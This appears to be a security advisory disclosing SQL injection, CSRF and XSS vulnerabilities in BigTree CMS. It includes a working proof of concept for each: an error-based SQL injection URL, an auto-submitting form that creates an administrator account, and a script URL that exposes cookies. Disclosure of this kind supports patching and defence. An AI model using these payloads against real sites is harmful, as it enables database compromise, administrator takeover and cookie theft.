Multiple Vulnerabilities in BigTree CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application’s database and gain complete control over the application.

1. SQL Injection in BigTree CMS: CVE-2013-4879
   The vulnerability exists due to insufficient sanitisation of user-supplied data passed to “/site/index.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.
   The following PoC (Proof of Concept) code displays version of MySQL server:
   http://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28* %29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%2 9*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
   SQL injection vulnerability was independently discovered by the Vendor just before High-Tech Bridge Security Research Lab.

2. Сross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881
   The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges.
   The basic CSRF exploit below will create a new administrator “attacker” with password “password”:
   <form action=“http://[host]/site/index.php/admin/users/create/” method=“post” name=“main”>
   <input type=“hidden” name=“email” value="[email protected]">
   <input type=“hidden” name=“password” value=“password”>
   <input type=“hidden” name=“level” value=“1”>
   <input type=“hidden” name=“name” value=“attacker”>
   <input type=“hidden” name=“company” value=“company”>
   <input type=“submit” id=“btn”>
   </form>
   <script>
   document.main.submit();
   </script>

3. Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880
   The vulnerability exists due to insufficient filtration of user-supplied data in “module” HTTP GET parameter passed to “/site/index.php/admin/developer/modules/views/add/” URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
   The exploitation example below uses the “alert()” JavaScript function to display administrator’s cookies:
   http://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl